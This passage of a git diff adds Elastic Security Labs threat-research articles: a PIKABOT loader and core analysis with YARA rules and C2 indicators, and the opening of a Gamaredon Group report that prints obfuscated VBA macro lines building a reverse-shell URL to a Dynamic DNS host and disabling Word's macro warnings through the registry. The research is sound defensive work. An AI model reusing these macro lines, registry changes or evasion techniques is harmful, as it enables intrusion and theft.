of the PIKABOT loader.\n\n\n\n\nThe malicious code employs heavy obfuscation, utilizing a technique where a jump (```JMP```) follows each assembly instruction. This approach significantly complicates analysis by disrupting the straightforward flow of execution.\n\n\n\n \nThe loader extracts its stage 2 payload from the ```.text``` section, where it is stored in chunks of ```0x94``` bytes, before consolidating the pieces. It then employs a seemingly custom decryption algorithm, which utilizes bitwise operations. \n\n\n\n\nThe next step of the process is to reflectively load the PE file within the confines of the currently executing process. 
This technique involves dynamically loading the PE file's contents into memory and executing it, without the need for the file to be physically written to disk. This method not only streamlines the execution process by eliminating the necessity for external file interactions but also significantly enhances stealth by minimizing the digital footprint left on the host system.\n\n\n\n\n### Loader stage 2\n\nThe stage 2 loader, tasked with initializing the PIKABOT core within a newly established process, employs a blend of code and string obfuscation techniques similar to those found in the core itself. In addition to its obfuscation capabilities, the loader incorporates a series of advanced anti-debugging countermeasures.\n\n#### Anti-debugging\n\nThe malware utilizes specific NTDLL ```Zw``` APIs for a variety of operations, including debugger detection, process creation, and injection, aiming to stay under the radar of detection mechanisms and evade EDR (Endpoint Detection and Response) user-land hooking, as well as debugging attempts. \n\nIt executes syscalls directly, bypassing conventional API calls that are more susceptible to monitoring and interception. It uses a wrapper function that facilitates the execution of syscalls in 64-bit mode which takes a hash of a ```Zw``` API name as a parameter.\n\n\n\n\nThe wrapper function extracts the syscall ID by parsing the loaded NTDLL and matching the hash of the ```Zw``` function name. After finding the correct syscall ID, it uses the ```Wow64Transition``` Windows API to execute the syscall in 64-bit mode.\n\n\n\n\nNote that the parameters needed are pushed on the stack before the wrapper is called, the following example showcases a ```ZwQueryInformationProcess``` call with the ```ProcessInformationClass``` set to ```ProcessDebugPort```(7):\n\n\n\n\nThe malware employs a series of anti-debugging techniques designed to thwart detection by debugging and forensic tools. 
These techniques include:\n - Calling ```ZwQuerySystemInformation``` with the ```SystemKernelDebuggerInformation``` parameter to detect the presence of kernel debuggers.\n - Calling ```ZwQueryInformationProcess``` with the ```ProcessInformationClass``` set to ```ProcessDebugPort``` to identify any debugging ports associated with the process.\n - Calling ```ZwQueryInformationProcess``` again, but with the ```ProcessInformationClass``` set to ```ProcessDebugFlags```, to ascertain if the process has been flagged for debugging.\n - Inspecting the Process Environment Block (PEB) for the ```BeingDebugged``` flag, which indicates if the process is currently being debugged.\n - Using ```GetThreadContext``` to detect hardware breakpoints.\n - Scanning the list of currently running processes to identify any active debugging or forensic tools.\n\n\n\n\nInterestingly, we discovered a bug where some of the process names it checks have their first byte zeroed out; this could suggest a mistake by the malware’s author or an unwanted side effect introduced by the obfuscation tool. The full list of process names that are checked can be found at the end of this article.\n\n\n\n\n#### Execution\n\nThe loader populates a global variable with the addresses of essential APIs from the NTDLL and KERNEL32 libraries. This step is pivotal for the malware's operation, as these addresses are required for executing subsequent tasks. 
Note that the loader employs a distinct API name hashing algorithm, diverging from the one previously used for `Zw` APIs.\n\n\n\n\nBelow is the reconstructed structure:\n\n```C\nstruct global_variable\n{\n int debugger_detected;\n void* LdrLoadDll;\n void* LdrGetProcedureAddress;\n void* RtlAllocateHeap;\n void* RtlFreeHeap;\n void* RtlDecompressBuffer;\n void* RtlCreateProcessParametersEx;\n void* RtlDestroyProcessParameters;\n void* ExitProcess;\n void* CheckRemoteDebuggerPresent;\n void* VirtualAlloc;\n void* GetThreadContext;\n void* VirtualFree;\n void* CreateToolhelp32Snapshot;\n void* Process32FirstW;\n void* Process32NextW;\n void* ntdll_module;\n void* kernel32_dll;\n int field_48;\n uint8_t* ptr_decrypted_PIKABOT_core;\n int decrypted_PIKABOT_core_size;\n TEB* TEB;\n};\n```\nLoader structure \n\nThe malware then consolidates bytes of the PIKABOT core that are scattered in the `.data` section in base64-encoded chunks, which is noteworthy when compared to a previous version which loaded a set of PNGs from its resources section.\n\n\n\n\nIt executes a sequence of nine distinct functions, each performing similar operations but with varying arguments. Each function decrypts an RC4 key using an in-line process that utilizes strings that appear legitimate. The function then base64 decodes each chunk before decrypting the bytes.\n\n\n\n\nAfter consolidating the decrypted bytes, it uses the ```RtlDecompressBuffer``` API to decompress them.\n\n\n\n\n\nThe loader creates a suspended instance of ```ctfmon.exe``` using the ```ZwCreateUserProcess``` syscall, a tactic designed to masquerade as a legitimate Windows process. Next, it allocates a large memory region remotely via the ```ZwAllocateVirtualMemory``` syscall to house the PIKABOT core's PE file.\n\nSubsequently, the loader writes the PIKABOT core into the newly allocated memory area using the ```ZwWriteVirtualMemory``` syscall. 
It then redirects the execution flow from ```ctfmon.exe``` to the malicious PIKABOT core by calling the ```SetContextThread``` API to change the thread's execution address. Finally, it resumes the thread with ```ZwResumeThread``` syscall.\n\n\n\n\n## PIKABOT core\n\nThe overall behavior and functionality of the updated PIKABOT core are similar to previous versions: the bot collects initial data from the victim machine and presents the threat actor with command and control access to enable post-compromise behavior such as command-line execution, discovery, or launching additional payloads through injection. \n\nThe notable differences include:\n - New style of obfuscation with fewer in-line functions\n - Multiple implementations for decrypting strings\n - Plaintext configuration at runtime, removal of JSON format \n - Network communication uses RC4 plus byte swapping, removal of AES\n\n### Obfuscation \n\nOne of the most apparent differences is centered around the obfuscation of PIKABOT. This version contains a drastically less obfuscated binary but provides a familiar feel to older versions. Instead of a barrage of in-line RC4 functions, there are only a few left after the new update. Unfortunately, there is still a great deal of obfuscation applied to global variables and junk instructions. \n\nBelow is a typical example of junk code being inserted in between the actual malware’s code, solely to extend analysis time and add confusion. \n\n\n\n\n### String Decryption\n\nAs mentioned previously, there are still some in-line RC4 functions used to decrypt strings. In previous versions, the core used base64 encoding as an additional step in combination with using AES and RC4 to obscure the strings; in this core version, we haven’t seen base64 encoding or AES used for string decryption.\n\nHere’s an instance of a remaining in-line RC4 function used to decrypt the hardcoded mutex. 
In this version, PIKABOT continues its trademark use of legitimate strings as the RC4 key to decrypt data.\n\n\n\n\n\n\n\nIn this new version, PIKABOT includes a different implementation for string obfuscation by using stack strings and placing individual characters into an array in a randomized order. Below is an example using ```netapi32.dll```:\n\n\n\n\n\n### Anti-debugging\n\nIn terms of anti-debugging in this version, PIKABOT checks the ```BeingDebuggedFlag``` in the PEB along with using ```CheckRemoteDebuggerPresent```. In our sample, a hardcoded value (```0x2500```) is returned if a debugger is attached. Unfortunately, these checks are not in a single place but are scattered throughout the binary, for example right before network requests are made.\n\n\n\n\n### Execution\n\nRegarding execution and overall behaviors, PIKABOT’s core closely follows the execution flow of older versions. Upon execution, PIKABOT parses the PEB and uses API hashing to resolve needed libraries at runtime. Next, it validates the victim machine by verifying the language identifier using ```GetUserDefaultLangID```. If the `LangID` is set to Russian (```0x419```) or Ukrainian (```0x422```), the malware will immediately stop its execution.\n\n\n \nAfter the language check, PIKABOT creates a mutex to prevent reinfection on the same machine. Our sample used the following mutex: ```{6F70D3AF-34EF-433C-A803-E83654F6FD7C}```.\n\nNext, the malware will generate a UUID from the victim machine using the system volume number in combination with the hostname and username. PIKABOT will then generate a unique RC4 key seeded by ```RtlRandomEx``` and then place the key into the config structure to be used later during its network communications.\n\n### Initial Collection\n\nThe next phase involves collecting victim machine information and placing the data into a custom structure that will then be encrypted and sent out after the initial check-in request. 
The following actions are used to fingerprint and identify the victim and their network:\n - Retrieves the name of the user associated with the PIKABOT thread\n - Retrieves the computer name \n - Gets processor information\n - Grabs display device information using ```EnumDisplayDevicesW```\n - Retrieves domain controller information using ```DsGetDcNameW```\n - Collects current usage around physical and virtual memory using ```GlobalMemoryStatusEx```\n - Gets the window dimensions using ```GetWindowRect``` used to identify sandbox environments\n - Retrieves Windows OS product information using ```RtlGetVersion```\n - Uses ```CreateToolhelp32Snapshot``` to retrieve process information\n\n\n\n\n### Config\n\nOne strange development decision in this new version is around the malware configuration. At runtime, the configuration is in plaintext and located in one spot in memory. This does eventually get erased in memory. We believe this will only temporarily last as previous versions protected the configuration and it has become a standard expectation when dealing with prevalent malware families. \n\n\n\n\n### Network\n\nPIKABOT performs network communication over HTTPS on non-traditional ports (2967, 2223, etc) using User-Agent ```Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)```. The build number of the PIKABOT core module is concatenated together from the config and can be found being passed within the encrypted network requests, the version we analyzed is labeled as ```1.8.32-beta```.\n\n\n\n\nOn this initial check-in request to the C2 server, PIKABOT registers the bot while sending the previously collected information encrypted with RC4. The RC4 key is sent in this initial packet at offset (```0x10```). As mentioned previously, PIKABOT no longer uses AES in its network communications. 
\n\n```\nPOST https://158.220.80.167:2967/api/admin.teams.settings.setIcon HTTP/1.1\nCache-Control: no-cache\nConnection: Keep-Alive\nPragma: no-cache\nAccept: */*\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.8\nUser-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)\nContent-Length: 6778\nHost: 158.220.80.167:2967\n\n00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2...\n```\n_PIKABOT initial check-in request_\n\nFor each outbound network request, PIKABOT randomly chooses one of the following URIs:\n\n```\n/api/admin.conversations.convertToPrivate\n/api/admin.conversations.getConversationPrefs\n/api/admin.conversations.restrictAccess.removeGroup\n/api/admin.emoji.add\n/api/admin.emoji.addAlias\n/api/admin.emoji.list\n/api/admin.inviteRequests.approved.list\n/api/admin.teams.admins.list\n/api/admin.teams.settings.setIcon\n/api/admin.usergroups.addTeams\n/api/admin.users.session.reset\n/api/apps.permissions.users.list\n```\n_List of URIs used in PIKABOT C2 requests_\n\nUnlike previous versions, in which victim data was placed in a structured JSON format, the data within these requests consists of raw bytes. The first 16 bytes pass specific config information (bot command ID, byte shift, etc.). The next 32 bytes embed the RC4 key for the session, followed by the encrypted data. \n\nThere is one additional transformation where the developers added a random shift of bytes that occurs at runtime. This number (`0x18`) at offset (`0xF`) in the example request below represents the number of bytes to shift from the end of the encrypted data to the start of the encrypted data. In our example, to successfully decrypt the data, the last `0x18` bytes would need to be placed in front of bytes (`0xDA 0x9E`). 
\n\n\n\n\n### Bot Functionality\n\nIn terms of the core bot functionality, it is similar to previous versions: executing commands, performing discovery, and performing process injection. From our perspective, it still seems very much like a work in progress. One command ID (`0x982`) is an empty function; in another case, three unique command IDs point to the same function. These indicate that this software is not quite complete.\n\n\n| Command ID | Description |\n|------------|-------------|\n| 0x1FED | Beacon timeout |\n| 0x1A5A | Exits the PIKABOT process |\n| 0x2672 | Includes obfuscation, but appears to not do anything meaningful |\n| 0x246F | Creates file on disk and modifies registry tied to configuration |\n| 0xACB | Command-line execution with output |\n| 0x36C | PE inject in a remote process |\n| 0x792 | Shellcode inject in a remote process |\n| 0x359, 0x3A6, 0x240 | Command-line execution similar to 0xACB, uses custom error code (0x1B3) |\n| 0x985 | Process enumeration, similar to initial victim collection enumeration |\n| 0x982 | Empty function |\n\n### Malware and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n#### Tactics\nTactics represent the _why_ of a technique or sub-technique. 
It is the adversary’s tactical goal: the reason for performing an action.\n\n - [Initial Access](https://attack.mitre.org/tactics/TA0001)\n - [Execution](https://attack.mitre.org/tactics/TA0002/)\n - [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n - [Discovery](https://attack.mitre.org/tactics/TA0007)\n - [Command and Control](https://attack.mitre.org/tactics/TA0011)\n - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n \n#### Techniques\nTechniques represent how an adversary achieves a tactical goal by performing an action.\n\n - [Phishing](https://attack.mitre.org/techniques/T1566/)\n - [User Execution: Malicious Link](https://attack.mitre.org/techniques/T1204/001/)\n - [Reflective Code Loading](https://attack.mitre.org/techniques/T1620/)\n - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n - [Process Injection](https://attack.mitre.org/techniques/T1055/)\n - [Encrypted Channel](https://attack.mitre.org/techniques/T1573/)\n\n## Detecting malware\n\n### Prevention\n\n - [Network Module Loaded from Suspicious Unbacked Memory](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml)\n - [Shellcode Execution from Low Reputation Module](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_shellcode_execution_from_low_reputation_module.toml)\n - [Suspicious Memory Write to a Remote Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_memory_write_to_a_remote_process.toml)\n - [Suspicious Remote Memory Allocation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_remote_memory_allocation.toml)\n - [Process Creation with Unusual Mitigation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_with_unusual_mitigation.toml)\n - 
[Windows.Trojan.PikaBot](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PikaBot.yar)\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify [PIKABOT](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_PikaBot.yar):\n\n```\nrule Windows_Trojan_Pikabot_5441f511 {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-02-15\"\n last_modified = \"2024-02-15\"\n license = \"Elastic License v2\"\n description = \"Related to PIKABOT core\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.PIKABOT\"\n\n strings:\n $handler_table = { 72 26 [6] 6F 24 [6] CB 0A [6] 6C 03 [6] 92 07 }\n $api_hashing = { 3C 60 76 ?? 83 E8 20 8B 0D ?? ?? ?? ?? 6B FF 21 }\n $debug_check = { A1 ?? ?? ?? ?? FF 50 ?? 50 50 80 7E ?? 01 74 ?? 83 7D ?? 00 75 ?? }\n $checksum = { 55 89 E5 8B 55 08 69 02 E1 10 00 00 05 38 15 00 00 89 02 5D C3 }\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 }\n $read_xbyte_config = { 8B 43 04 8B 55 F4 B9 FC FF FF FF 83 C0 04 29 D1 01 4B 0C 8D 0C 10 89 4B 04 85 F6 ?? ?? 89 16 89 C3 }\n condition:\n 2 of them\n}\n\nrule Windows_Trojan_Pikabot_95db8b5a {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2024-02-15\"\n last_modified = \"2024-02-15\"\n license = \"Elastic License v2\"\n description = \"Related to PIKABOT loader\"\n os = \"Windows\"\n arch = \"x86\"\n threat_name = \"Windows.Trojan.PIKABOT\"\n\n strings:\n $syscall_ZwQueryInfoProcess = { 68 9B 8B 16 88 E8 73 FF FF FF }\n $syscall_ZwCreateUserProcess = { 68 B2 CE 2E CF E8 5F FF FF FF }\n $load_sycall = { 8F 05 ?? ?? ?? ?? 83 C0 04 50 8F 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 04 A3 ?? ?? ?? ?? 31 C0 64 8B 0D C0 00 00 00 85 C9 }\n $payload_chunking = { 8A 84 35 ?? ?? ?? ?? 8A 95 ?? ?? ?? ?? 88 84 1D ?? ?? ?? ?? 88 94 35 ?? ?? ?? ?? 02 94 1D ?? ?? ?? ?? 
}\n $loader_rc4_decrypt_chunk = { F7 FF 8A 84 15 ?? ?? ?? ?? 89 D1 8A 94 1D ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 8B 55 08 88 84 1D ?? ?? ?? ?? 02 84 0D ?? ?? ?? ?? 0F B6 C0 8A 84 05 ?? ?? ?? ?? 32 04 32 }\n condition:\n 2 of them\n}\n```\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/pikabot) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------|-------------|-------------|-------------|\n| `2f66fb872c9699e04e54e5eaef982784b393a5ea260129a1e2484dd273a5a88b` | SHA-256 | `Opc.zip` | Zip archive holding obfuscated JavaScript |\n| `ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d` | SHA-256 | `grepWinNP3.exe` | PIKABOT loader |\n| `139.84.237[.]229:2967` | ipv4-addr | | PIKABOT C2 server |\n| `85.239.243[.]155:5000` | ipv4-addr | | PIKABOT C2 server |\n| `104.129.55[.]104:2223` | ipv4-addr | | PIKABOT C2 server |\n| `37.60.242[.]85:9785` | ipv4-addr | | PIKABOT C2 server |\n| `95.179.191[.]137:5938` | ipv4-addr | | PIKABOT C2 server |\n| `65.20.66[.]218:5938` | ipv4-addr | | PIKABOT C2 server |\n| `158.220.80[.]157:9785` | ipv4-addr | | PIKABOT C2 server |\n| `104.129.55[.]103:2224` | ipv4-addr | | PIKABOT C2 server |\n| `158.220.80[.]167:2967` | ipv4-addr | | PIKABOT C2 server |\n| `entrevientos.com[.]ar` | domain | | Hosting infra for zip archive |\n| `gloverstech[.]com` | domain | | Hosting infra for PIKABOT loader |\n\n## References\n\nThe following were referenced throughout the above research:\n - [https://www.zscaler.com/blogs/security-research/d-evolution-PIKABOT](https://www.zscaler.com/blogs/security-research/d-evolution-pikabot)\n - [https://x.com/Cryptolaemus1/status/1755655639370514595?s=20](https://x.com/Cryptolaemus1/status/1755655639370514595?s=20)\n\n## Appendix\n\n```\nProcess Name 
Checks\ntcpview.exe\nfilemon.exe\nautoruns.exe\nautorunsc.exe\nProcessHacker.exe\nprocmon.exe\nprocexp.exe\nidaq.exe\nregmon.exe\nidaq64.exe\n\n\nx32dbg.exe\nx64dbg.exe\nFiddler.exe\nhttpdebugger.exe\ncheatengine-i386.exe\ncheatengine-x86_64.exe\ncheatengine-x86_64-SSE4-AVX2.exe\n\n\nPETools.exe\nLordPE.exe\nSysInspector.exe\nproc_analyzer.exe\nsysAnalyzer.exe\nsniff_hit.exe\nwindbg.exe\njoeboxcontrol.exe\njoeboxserver.exe\nResourceHacker.exe\n\n\nImmunityDebugger.exe\nWireshark.exe\ndumpcap.exe\nHookExplorer.exe\nImportREC.exe\n```"
+ },
+ "title": "PIKABOT, I choose you!",
+ "slug": "pikabot-i-choose-you",
+ "date": "2024-02-24",
+ "description": "Elastic Security Labs observed new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "photo-edited-02.png",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "pikabot",
+ "loader",
+ "syscalls"
+ ]
+ },
+ "id": "security_labs_content-pikabot_i_choose_you-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-playing_defense_against_gamaredon_group-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-playing_defense_against_gamaredon_group-md.json
new file mode 100644
index 00000000000..62157043dfe
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-playing_defense_against_gamaredon_group-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Playing defense against Gamaredon Group\"\nslug: \"playing-defense-against-gamaredon-group\"\ndate: \"2022-06-21\"\ndescription: \"Learn about the recent campaign of a Russia-based threat group known as Gamaredon Group. This post will review these details and provide detection strategies.\"\nauthor:\n - slug: daniel-stepanic\n - slug: andrew-pease\n - slug: seth-goodwin\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-digital-shield.jpg\"\ncategory:\n - slug: activity-group\n---\n\nFor several months, the Intelligence & Analytics team at Elastic Security has tracked an ongoing adversary campaign appearing to target Ukrainian government officials. Based on our monitoring, we believe [Gamaredon Group](https://attack.mitre.org/groups/G0047/), a suspected Russia-based threat group, is behind this campaign. Our observations suggest a significant overlap between tactics, techniques, and procedures (TTPs) included within this campaign and [public reporting](https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine).\n\nThis campaign has produced and deployed updated lures on a near-daily basis that appear to target multiple Ukrainian government departments. With this high operational tempo and aggressive targeting, they consistently employ a cluster of initial access techniques and procedures. 
Over the past four months, these techniques have consisted of spearphishing, remote document template injection, startup folder persistence, VBA/VBScript languages, and Dynamic DNS command & control infrastructure.\n\nIn this post, we’ll walk through the campaign details, reviewing the implementation while also providing solutions such as detection strategies through the use of Elastic’s [Event Query Language (EQL)](https://www.elastic.co/blog/introducing-event-query-language).\n\n## Campaign Details\n\nThe earliest identified [infrastructure](https://www.virustotal.com/gui/domain/libre-templates.ddns.net/details) indicates this campaign has been active since August 2019. The first [sample](https://www.virustotal.com/gui/file/481eee236eadf6c947857820d3af5a397caeb8c45791f0bbdd8a21f080786e75/details) leveraging this domain was submitted to VirusTotal in early September 2019. Spearphishing emails like the example in Figure 1 (below) were used to deliver a malicious attachment and demonstrate Gamaredon Group’s attempt to impersonate an anti-corruption activist. This example targeted the National Security and Defense Council of Ukraine and dates to January 17, 2020.\n\n\n\n_Figure 1 - Spearphishing email sent to National Security and Defense Council of Ukraine_\n\nA typical lure document might masquerade as an information request to the Ministry of Foreign Affairs of Ukraine. These manufactured lures included official logos stolen from governmental offices of Ukraine and impersonated diplomats known to their targets.\n\n\n\n_Figure 2 - Lure document - Ministry of Foreign Affairs in Ukraine request_\n\nTo improve their chances of success, they customize the request around the same date of the campaign and include urgent requests for action. These efforts are indicative of necessity.\n\n\n\n_Figure 3 - Lure document - Information request related to NSDC Head of Ukraine_\n\nOften, the call to action first required the victim to open an attached lure document. 
A user who attempted to open one of these malicious attachments would see a perfectly convincing decoy document, while a sequence of invisible actions occurred behind the screen. These documents end up leveraging a technique known as [template injection](https://attack.mitre.org/techniques/T1221/), a method of loading remotely hosted Microsoft Word document templates.\n\nMicrosoft Word objects function similarly to compressed archives and have properties defined using Microsoft’s Open Office XML (OOXML) format. Within the decompressed word/\\_rels/ subdirectory, the file settings.xml.rels contained a network location where a remotely hosted template was retrieved as depicted in Figure 4.\n\n\n\n_Figure 4 - Excerpt from Settings.xml.rels_\n\nEach external URL within these lures was configured to point to Dynamic DNS providers (ddns.net, hopto.org). Dynamic DNS provides automation around updating a name server in the Domain Name System (DNS). The adoption of this technique shows the adversary’s attempt to mask their ownership and obscure atomic indicator associations through the use of transient infrastructure, such as Dynamic DNS.\n\n\n\n_Figure 5 - Word startup screen showing download of remote document template_\n\nThe remote templates are macro-enabled, configured to execute VBA macro code that persists a VBScript object in the victim’s startup folder as a foothold. We assess that the objective of this initial code is to identify the victim and to protect the second-stage payload that is intended only for their targeted victims. In the next sections, we will review the document’s metadata and macro code found in a recent [sample](https://www.virustotal.com/gui/file/feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f/details).\n\n## Document metadata analysis\n\nIn malicious campaigns, infrastructure is commonly created for specific targets. 
This serves multiple purposes, but frequently it’s done to track implants and frustrate automated research and analysis. As analysts, this gives us some insight into the adversaries’ maturity, experience, and resources. As an example, an adversary who reuses lure documents or templates may be less experienced, not interested in high-value targets, or using monetized infrastructure from previous campaigns.\n\nAnalyzing the metadata from the lure document and template allows us to see when these weaponized documents were created, as well as identify any associations between different elements of the campaign.\n\nAs we can see in Figure 6, the lure document was created on December 24, 2019 by the Author “ШУРИК”. In Figure 7, we can see that the Author is the same as observed in the lure document (ШУРИК). Additionally, we can see that the remote template was created on December 12, 2019 and then modified on December 24, 2019. There were 5 modifications to it, indicating that it has been used for 5 campaigns in 12 days — or about 2.5 days per campaign. With moderate confidence, this tells us that the remote template is likely reused and updated with new macros for new campaigns, and that they were created by the same Author (or at a minimum, the same instance of Microsoft Word).\n\nAs an analyst note, we see different tool markings that indicate this was created by a Russian speaker (Russian Author, Russian Language Code, Cyrillic character set, and the usage of Reanimator Extreme Edition). While we can use those as information to help inform overall analysis, this information can be seeded — so it doesn’t prove anything definitively on its own. 
In this case, this aligns with other open source analysis linking this to the Gamaredon Group, which is believed to be Russian in origin.\n\n| | |\n| ---------------------- | ----------------------------------------------------------------------- |\n| File Size | 46 kB |\n| File Type Extension | docx |\n| MIME Type | application/vnd.openxmlformats-officedocument.wordprocessingml.document |\n| Last Modified By | ШУРИК |\n| Revision Number | 2 |\n| Create Date | 2019:12:24 15:58:00Z |\n| Modify Date | 2019:12:24 16:10:00Z |\n| Template | pos.dot |\n| Total Edit Time | 2 minutes |\n| Pages | 1 |\n| Words | 195 |\n| Characters | 1114 |\n| Application | Microsoft Office Word |\n| Lines | 9 |\n| Paragraphs | 2 |\n| Company | Reanimator Extreme Edition |\n| Characters With Spaces | 1307 |\n\n_Figure 6 - Metadata from the lure document (truncated for length)_\n\n| | |\n| ---------------------- | -------------------------- |\n| File Size | 44 kB |\n| File Type Extension | doc |\n| MIME Type | application/msword |\n| Language Code | Russian |\n| Author | ШУРИК |\n| Template | pos.dot |\n| Last Modified By | ШУРИК |\n| Software | Microsoft Office Word |\n| Create Date | 2019:12:12 11:48:00 |\n| Modify Date | 2019:12:24 10:30:00 |\n| Code Page | Windows Cyrillic |\n| Company | Reanimator Extreme Edition |\n| Char Count With Spaces | 0 |\n| Revision Number | 5 |\n| Total Edit Time | 0 |\n| Words | 0 |\n| Characters | 0 |\n| Pages | 1 |\n| Paragraphs | 1 |\n| Lines | 1 |\n\n_Figure 7 - Metadata from the remote template (truncated for length)_\n\nWhile we cannot state with any authority, searching for the Author “ШУРИК” has identified similar TTPs (lure documents with remote template injection) as far back as September of 2019.\n\n## Macro code analysis\n\nThe macro code was obfuscated using string concatenation and procedurally generated variables — techniques that are often used to bypass static detection technologies. 
Upon execution, this code provides reverse shell functionality that allows an adversary access to the victim’s system and capability to access shared resources on their local network. Figure 8 contains an excerpt of the macro that depicts the creation of a reverse shell and some of the system information collected automatically.\n\n```\nDim NoARzTHy\nNoARzTHy = \"Set WShell=CreateObject(\"\"WSc\" + \"ri\" + \"pt.S\" + \"hel\" + \"l\"\")\"\nSet PWFJWatF = CreateObject(\"WScr\" + \"ipt.Ne\" + \"two\" + \"rk\")\nDim pbuvwTLK, JzESywut\nSet GGZucIZE = CreateObject(\"Sc\" + \"rip\" + \"ting.Fi\" + \"leSy\" + \"stemOb\" + \"ject\")\npbuvwTLK = GGZucIZE.Drives(Environ(\"Syst\" + \"emDri\" + \"ve\")).SerialNumber\nOYTgBXAP = PWFJWatF.ComputerName\n```\n\n_Figure 8 - First 7 lines of macro code from the loaded document template_\n\nFigure 9 shows an excerpt of the same code removing the concatenation.\n\n```\nDim NoARzTHy\nNoARzTHy = \"Set WShell=CreateObject(\"WScript.Shell\")\"\nSet PWFJWatF = CreateObject(\"WScript.Network\")\nDim pbuvwTLK, JzESywut\nSet GGZucIZE = CreateObject(\"Scripting.FileSystemObject\")\npbuvwTLK = GGZucIZE.Drives(Environ(\"SystemDrive\")).SerialNumber\nOYTgBXAP = PWFJWatF.ComputerName\n```\n\n_Figure 9 - First 7 lines of macro code - Removal of concatenation_\n\nThe serial number and hostname of the victim's computer are some of the first pieces of information the VBA collects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the implant and the victim. 
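The identifier construction can be approximated as follows. This is an illustrative sketch, not the macro's actual routine (which is obfuscated); the helper name and the exact hexadecimal rendering of the serial number are assumptions:

```python
def implant_victim_id(hostname: str, volume_serial: int) -> str:
    """Join the hostname and a hex rendering of the volume serial number,
    approximating the <ComputerName>_<SerialNumber> identifier seen in the URI."""
    return f"{hostname}_{volume_serial & 0xFFFFFFFF:08X}"

# Made-up lab values, not indicators from the campaign:
print("http://example[.]invalid/" + implant_victim_id("ENDPOINT1", 1234567890) + "//posolreboot.php")
# -> http://example[.]invalid/ENDPOINT1_499602D2//posolreboot.php
```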
Figure 10 shows the configuration of the URI request within the macro and Figure 11 represents an example URI.\n\n```\nJzESywut = \"h\" + \"tt\" + \"p:\" + \"//l\" + \"ibcr\" + \"ash.dd\" + \"ns.ne\" + \"t/\" & OYTgBXAP & \"_\" & HFzesifc & \"//po\" + \"sol\" + \"re\" + \"boo\" + \"t.ph\" + \"p\"\n```\n\n_Figure 10 - URI request configuration - Macro_\n\n```\nJzESywut = hxxp://libcrash.ddns[.]net/ENDPOINT1_96L02G3D//posolreboot.php\n```\n\n_Figure 11 - URI request configuration - Example_\n\nBy default, Microsoft disables external or untrusted macros by setting key values in the registry at HKCU\\Software\\Microsoft\\Office\\(VERSION)\\Word\\Security\\. The first registry modification made by this macro sets the AccessVBOM value to 1, enabling programmatic access to the VBA project object model (which is disabled by default). The second registry modification sets VBAWarnings to 1, which enables all macros automatically and disables warnings for future macro-enabled objects. Figure 12 represents the macro code for these registry modifications.\n\n```\nFEDzCjgi$ = \"HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\" & Application.Version & _\n\"\\Word\\Security\\\"\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ & \"AccessVBOM\", 1, \"REG_DWORD\"\nCreateObject(\"WScript.Shell\").RegWrite FEDzCjgi$ & \"VBAWarnings\", 1, \"REG_DWORD\"\n```\n\n_Figure 12 - Registry modifications found in macro_\n\nThe remaining lines of code write a VBScript file to the user’s startup directory. 
